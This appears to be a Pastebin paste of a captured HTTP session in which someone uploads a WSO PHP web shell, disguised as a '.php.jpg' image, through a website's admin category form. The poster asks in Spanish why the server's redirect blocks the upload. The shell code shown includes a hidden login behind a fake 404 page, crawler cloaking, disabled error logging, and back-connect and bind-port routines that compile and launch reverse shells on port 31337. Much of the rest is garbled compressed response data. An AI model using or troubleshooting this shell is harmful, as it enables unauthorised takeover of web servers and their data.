Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- POST /admin/categories?rid=63&type=Edit&play=save&page= HTTP/1.1
- Host: www.*********.com
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=
- Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
- Content-Type: multipart/form-data; boundary=---------------------------1966138998259963822131653635
- Content-Length: 74857
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="categories_name_1"
- Cloth Dryers
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="meta_keywords_1"
- Cloth Dryers
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="meta_description_1"
- Cloth Dryers
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="categories_description_1"
- <p>Cloth Dryers</p>
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="parent_id"
- 43
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="categories_image"; filename="W5h311Oculta.php.jpg"
- Content-Type: image/jpeg
- <?php
- /* WSO 2.1 (Web Shell by pgems.in) */
- /*Subhashdasyam.com*/
- /*$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";*/
- /*pass antigua=HACKED*/
- /*lo cambie por **********/
- $auth_pass = "*********";
- $color = "#00ff00";
- $default_action = 'FilesMan';
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', '2.1');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() {
- ?>
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <hr>
- <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form></center>
- <?php
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- <----------CORTE EL CODIGO DE LA WEB SHELL---------------->
- ***********************************************************
- ***********************************************************
- ******************POR MOTIVOS DEL TAMAÑO DEL POST**********
- ***********************************************************
- ***********************************************************
- <----------CORTE EL CODIGO DE LA WEB SHELL---------------->
- Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
- </form>
- <?php
- if(isset($_POST['p1'])) {
- function cf($f,$t) {
- $w=@fopen($f,"w") or @function_exists('file_put_contents');
- if($w) {
- @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
- @fclose($w);
- }
- }
- if($_POST['p1'] == 'bpc') {
- cf("/tmp/bp.c",$bind_port_c);
- $out = ex("gcc -o /tmp/bp /tmp/bp.c");
- @unlink("/tmp/bp.c");
- $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
- }
- if($_POST['p1'] == 'bpp') {
- cf("/tmp/bp.pl",$bind_port_p);
- $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
- }
- if($_POST['p1'] == 'bcc') {
- cf("/tmp/bc.c",$back_connect_c);
- $out = ex("gcc -o /tmp/bc /tmp/bc.c");
- @unlink("/tmp/bc.c");
- $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
- }
- if($_POST['p1'] == 'bcp') {
- cf("/tmp/bc.pl",$back_connect_p);
- $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
- }
- }
- echo '</div>';
- printFooter();
- }
- if( empty($_POST['a']) )
- if(isset($default_action) && function_exists('action' . $default_action))
- $_POST['a'] = $default_action;
- else
- $_POST['a'] = 'SecInfo';
- if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
- call_user_func('action' . $_POST['a']);
- ?>
- <div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r* - SubhashDasyam.com</marquee></div>
- </marquee></div>
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="prev_image"
- W5h311Oculta.php_63.jpg
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="keyword"
- _1345005537
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="column"
- 1
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="status"
- 1
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="sort_order"
- 1
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="filter[p]"
- p
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="sort[p]"
- 0
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="filter[m]"
- m
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="sort[m]"
- 0
- -----------------------------1966138998259963822131653635--
- HTTP/1.1 302 Moved Temporarily <<<----------------------------- ESTE ES LO QUE NO ME DEJA SUBIR LA SHELL????????????
- Date: Sat, 25 Aug 2012 15:36:43 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Location: /admin/categories?page=&msg=selected categories modified successfully!!
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 20
- Keep-Alive: timeout=2, max=100
- Connection: Keep-Alive
- Content-Type: text/html
- ....................GET /admin/categories?page=&msg=selected%20categories%20modified%20successfully!! HTTP/1.1
- Host: www.*********.com
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=
- Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
- HTTP/1.1 200 OK
- Date: Sat, 25 Aug 2012 15:36:49 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 5250
- Keep-Alive: timeout=2, max=99
- Connection: Keep-Alive
- Content-Type: text/html
- ...........ZmS....Lg..N..b..RHZ..........hss3.f-...I.J+........,..-0.L.Z.....=k.ZO.>...:....B8.....]p................`.}.g*.......8=..M....n..+..w~....:.f..L...*p.......Da.mMAX....y....z..4XiE\1.....\\o9....US
- .....r..Q..........\u.....P(.+...3".G,.{y..e.%y;...'.dA...u..a..)P....$.:..p....].....<D..J.?F........21......OE....Z......b$.!..$.q...?+..AA...W|..i.......i=i6a...N9...M|.u2j...z..]33.@..w..2.:......p.^"...g.*>.... .Y.s.Q..g..\NfA$bZ........e3D.S..sI.........._
- ...5....<.D......~.s.......... S<...N..G._..,.^].<.\..K.n...O........w`b
- .D.........?.D.....by
- ......eFM.p..!..L..j.....-..6..6.yO.Wmy..T...x..#.~....K.....,...b.(.....EXCi.t.....<..F
- _.../.....m...\.......`.x.2WH.......Y....%5I.m...A&...)...].a.J\....}C........}...D..'Tdu.....+..-|xze*....*miV.g....V.v.9G,e.&......eAE.3^....5.9.g..<.j.|].{..H
- .M2.:..<...5....,..djM...X(...4.YF..>.......+UUFV...V|.Y#.~N.r.E.....c.z...|.Kp..4....Y3S..i.e+.._y;e..c[k..".r.m..U.|......M...A......|....C....}.}e_.K7.....vc
- ....Jd.G14.8.XJ.D.+...S.V..Q.!.@d...
- .....~.`.T&<U..A.-.....o......v`......O(........#.Y\'...}.-.`/e8..2=<&St..,.c"..5V...um..
- ..0-i..](D.K<[.0..YW.."60........+9h...O.Lbv.
- ....$v6#....h..?..`l..Wg
- ..Gh5.{.....Q.....m._uS..`.6a......i.0...._s.+:k..$....*..E......
- ..A..I.......[...wD.4.,a1Z.O.....#p.$m.F.~..;<.1.......{'.X..2.3."...."...7..p4J...^.J..Qt.R8.9?.8.p..w|....x.............:*.!3..."`d...1GrS<..+&sf......p..i..;.......]...+e7.,..fAs^(.E.....(J......y.y.@.....F..0!....$.....-A.T.l...9..J0..2....>FO.\....2....!I.y[a......../.-.:.8...GC.Z...>w.K.x.....f..ar.H..7..gJFS..9&.F.....%.D....&...jU....2..i*~.n.e0. 2qd....M..............e.b.s.L1.g.s.cM.. .s\<.W..C.../....X.9m..z.......V.O.62...S.`j....-6Y.M=..GGck...s..Y|.......-g.q..5.>.@d...e..+.e..i.o!B.z@...o.P.@..E>&..u.z)...'-.....4n...r......B...a....3....L.O..$...c...H.HE2..p4.8dF....tn5....`......Io".-...1........`.........X...L.Bz..M......O....?..,y..~i.O..3....{.}+.qN?..l.........=..i......F./..6^...b..)9<C.........t.-U..3.`f...}L..#.c.......c,.s........^Z./<.6..M3/..T....0*["...9.~m$Q.W.t1..Y..O;.x$.&%.5gs...^.....3.&.!.....[x./..R.c....o.S.......^[.40\C.c.~LF.......a.Ig:,d.L1...Ky_..D..l`.......+S.qO.-....O...@m.G..;.' S*...j.N1,1u.]..\.T...M.@..M./......D....n.M.....]......l..k-B...:W1....t..`./'.).u..m..1^;..B.3*mQ;.86.
- .j4=..>..R.%5.S.s.d..C3...1.(TiT'....U.....=...3....RF.Vp.o..1......o....Z...j..h..U.G..S..T-1p3..dt(.......^*...........(!.<.{x$....s....yi...(.5.....yjh^;Q.K.......@.....[.....H&..H..S..4....7%.}..,...X/....,......qOC:.
- ....>6..D.XU.B.p.gk..NG....D.)f...8F...pG.Y@...:U.{..".&..&`...E
- #..j......q^...x.H...D.....X>.rcM.........=...)!...R....E.j..@.&5(.4....):..P9.#Q.L..n..x.;..Z(...X...........T..Q.U..%.we...<eE............F.&....?..z.Iu......U..5U..t.r...D`..b@..........6.nw/................A...5.i......]._..B.=..C.$....A./X%./.{t.N.bq...1...
- .O.z2.% ...:.x.6....A...3.)...<].......Kv3...<b......";..[.-..\0...H..gQ..[.s...p.n...BYq]j9.B.e...).N.N7.....X.99.n..<z.0ctp.....($...Ke..o.JV:....23...#...Z
- A3.K..;>...F....a.....J.
- ....%.......u..x....[..T..(l"..(.j........H.:.
- .kf...-0..FL..>c.@........g.....i...T.6>..O...$4....5..P..K..'=_Ob.5.I_."..p...y....E..6.d... S..;.$...} X;AM8..M...l.8+....eC.......aE...&]4.....wK.Z`.i........&......c....eZ.ZVj.wT..yn...jG......;....Z......h[..D..As:q=Q.....
- ..Q..Y.-...>...2y.......5<.....$._1....9.._..N....w.......;..0~..+.cx.gz.P.H..6.T..a..2..d......Y. .`..O..8.{p..HD.m..7.....=.";..'.f..;...7.b^N...2....;.B.$...6..7P...Z..z.......0..s..Y[9.....x...3...kxB.n`.."w;.]..0.(......V@..G....<..PnN.....k....aFA.!.U.iE-..ZPQ.H...I...../...Iy.R..4.$.mY.......b.~......p^h..`....}....yo...ar...Ab-.*.y..R#./..........g...#..{.tr:.s..^......Y..|..#....P...'4^;!...'..M=..jJ.Ht_.....kp&.fa...)v.~.[.......>...u..>..9..-.]....c-.'.f5.Nn..Y......*..T.a-Us...S;.?.......7...A"O.\Z..n(.t...n........(F....g>...^0...&P|I>q .....s......S..Z.nx.+...G.......M...}......
- .~...o.WUD..u.Z-.w..3caR:.&.......{A.P;..G..qx..[<V.Q<*......&..4.=....d...y(;jQVUDQ........Xn......B.m.......i.Kr}..Ay.<P....*..T..Z...>.K96.$.i,.N...i......)...k).....G........4.....@.E`U.E ...VQ4.~3'?....r..l..B...=.....T..S..8.E\U.E\n.$.l..N...(....0.
- G.].+..y...y.Z.Ke..&..........ts....xP.6.....|..)...5....<.."
- ........f...|I^S6+Fk.+FkY1.E...Q...E.<.>.,.... (...5......."
- ....$.\.?.,_P.P.M.Q.G.Q[.Le..*.:.w..a..y..&.D.6.D..$..".....d.\-C.|..V.x.TW(.J.6.J..T.."
- M.$..F.i\.3.P5....1j..QSYDQ.sx.......|.3o..O..ID:..S...M.Q.G.Q[.Me..$.......2.9.Y.+...x....j.5...;.4..y4.UmqWUDq......q.e....
- .P6.Fm..Fm.4.E...;...).)@...No...#..9#...J..........F.+.(.s^P.Js. Y.>....o"P.;....G..hF.....[4.E...D...7..i.7.M..4..:h...E.O9.'.C.
- _....my.^.5o....*.(...\......l..<..:.."
- ....$..@..y7.;*..Pi.S..._.-........{...3..mY.M..&..v.>..X&>.d.6.5|...%..h.....|.'.@....*o.l..D.
- ...I>.
- .[............1...*.Gs;<...m }...'7....!V{..@..F-.!p.....zLK=..SV&...,J;.,.....H.K/,O.T....S.E[.r..c.....<..jrL2..,,aDv.f....D^.....'.....z.!......m....<.U.....e&........5kI.U.....K.....G.....n......,...f>..^CK....<.......n..q.#J..D...........0.9... .
- {...u=eK....A........C..A_...#....7......L..I...x...@Gc..t3I......3...)d:5.I.+..D.K.....["....#............M ....[B.>.H.....+r.[4.....L*....C;B.A...`.>..}.wp..S.)..ko.._\.6....ty3.~...J.+...|Y.A..1.:../4...Io.-H^....P...Z.HS.....!Fu....GET /admin/images/thickbox/loadingAnimation.gif HTTP/1.1
- Host: www.*********.com
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
- Accept: image/png,image/*;q=0.8,*/*;q=0.5
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://www.*********.com/admin/categories?page=&msg=selected%20categories%20modified%20successfully!!
- Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
- HTTP/1.1 404 Not Found
- Date: Sat, 25 Aug 2012 15:36:51 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 3330
- Keep-Alive: timeout=2, max=98
- Connection: Keep-Alive
- Content-Type: text/html
- ...........ZmS....Lg..N..b..RHZ..........hss3.f-...I.J+........,..-0.L.Z.....=k.ZO.>...:....B8.....]p................`.}.g*.......8=..M....n..+..w~....:.f..L...*p.......Da.mMAX....y....z..4XiE\1.....\\o9....US
- .....r..Q..........\u.....P(.+...3".G,.{y..e.%y;...'.dA...u..a..)P....$.:..p....].....<D..J.?F........21......OE....Z......b$.!..$.q...?+..AA...W|..i.......i=i6a...N9...M|.u2j...z..]33.@..w..2.:......p.^"...g.*>.... .Y.s.Q..g..\NfA$bZ........e3D.S..sI.........._
- ...5....<.D......~.s.......... S<...N..G._..,.^].<.\..K.n...O........w`b
- .D.........?.D.....by
- ......eFM.p..!..L..j.....-..6..6.yO.Wmy..T...x..#.~....K.....,...b.(.....EXCi.t.....<..F
- _.../.....m...\.......`.x.2WH.......Y....%5I.m...A&...)...].a.J\....}C........}...D..'Tdu.....+..-|xze*....*miV.g....V.v.9G,e.&......eAE.3^....5.9.g..<.j.|].{..H
- .M2.:..<...5....,..djM...X(...4.YF..>.......+UUFV...V|.Y#.~N.r.E.....c.z...|.Kp..4....Y3S..i.e+.._y;e..c[k..".r.m..U.|......M...A......|....C....}.}e_.K7.....vc
- ....Jd.G14.8.XJ.D.+...S.V..Q.!.@d...
- .....~.`.T&<U..A.-.....o......v`......O(........#.Y\'...}.-.`/e8..2=<&St..,.c"..5V...um..
- ..0-i..](D.K<[.0..YW.."60........+9h...O.Lbv.
- ....$v6#....h..?..`l..Wg
- ..Gh5.{.....Q.....m._uS..`.6a......i.0...._s.+:k..$....*..E......
- ..A..I.......[...wD.4.,a1Z.O.....#p.$m.F.~..;<.1.......{'.X..2.3."...."...7..p4J...^.J..Qt.R8.9?.8.p..w|....x.............:*.!3..."`d...1GrS<..+&sf......p..i..;.......]...+e7.,..fAs^(.E.....(J......y.y.@.....F..0!....$.....-A.T.l...9..J0..2....>FO.\....2....!I.y[a......../.-.:.8...GC.Z...>w.K.x.....f..ar.H..7..gJFS..9&.F.....%.D....&...jU....2..i*~.n.e0. 2qd....M..............e.b.s.L1.g.s.cM.. .s\<.W..C.../....X.9m..z.......V.O.62...S.`j....-6Y.M=..GGck...s..Y|.......-g.q..5.>.@d...e..+.e..i.o!B.z@...o.P.@..E>&..u.z)...'-.....4n...r......B...a....3....L.O..$...c...H.HE2..p4.8dF....tn5....`......Io".-...1........`.........X...L.Bz..M......O....?..,y..~i.O..3....{.}+.qN?..l.........=..i......F./..6^...b..)9<C.........t.-U..3.`f...}L..#.c.......c,.s........^Z./<.6..M3/..T....0*["...9.~m$Q.W.t1..Y..O;.x$.&%.5gs...^.....3.&.!.....[x./..R.c....o.S...9.5...l.....,
- ..P...........`,d.L1...Fy_H.D..l`D......+S.qO.-....O...@m.G..;.' S*...j.N1,1u.]....T...M.@..M./......D....A.. 6
- ...:h)....>..Z....u.bx.C..v..(_^..6...;c.v<...gT..v*pl8.X.hz..}H...Kj|."...\T.f.1.c.P...NF......?.;{ ..f.5.q..6..T...c.)..nG...+t.p...>-..g.`....<..Zb.f....P...Aw...T\)v.-....5<QB&y...HRE=)...\....%|Q.k.g=......v...b7%.9....c....D.5.5.L.
- ....r.i..M.oJb.6$Y,.C.^.zA
- Y..M..g...t....9.}.n.....Z.f.D..@e....cY..S.<Z.q.........b..u....7E.M.WM..
- ...F....]%.......G........7....|....&....=#..{z.+RB......Pa.......MjPviX...St.?.r.G.......u..wdG.P..M.j....u5.s.........=J....#.y...q9!....?..mO.0.._.-...;PO=..#...K4......] ..@.=...L............)......R........._...k-.(R....R.91.#........M;.bV9(...U..,..5..I....q.?..[...f.k")..d6..LB...y._3...F.Q.._y......n.N.`...(D.B9.b..h.5...>.2..s.s....]-..&4%..x.w].'...6k.l..!cL.Rp.k.}.Nu[..c..{1...n.J#......m..)4...nx*u.J....2..`..a-mp..R..;h.H2........:..m...]....j.......d.9;..]7...!...wL...u..._......B..>MZl.H...p.\..6-.Lz..zp...^......)..........!N.....l@..@R....+. .......O.R+F...W.
- .G.......t...Wb..$D..f4.h!.zK.. .M......)]..............@......$ #&.,V=.........j...!.h....yR&.!..C.|Up....b....&.O.....0...|.ng?u|K.R.
- ..G.?...W.7.....(....v`..'.'...../........8..
Add Comment
Please, Sign In to add comment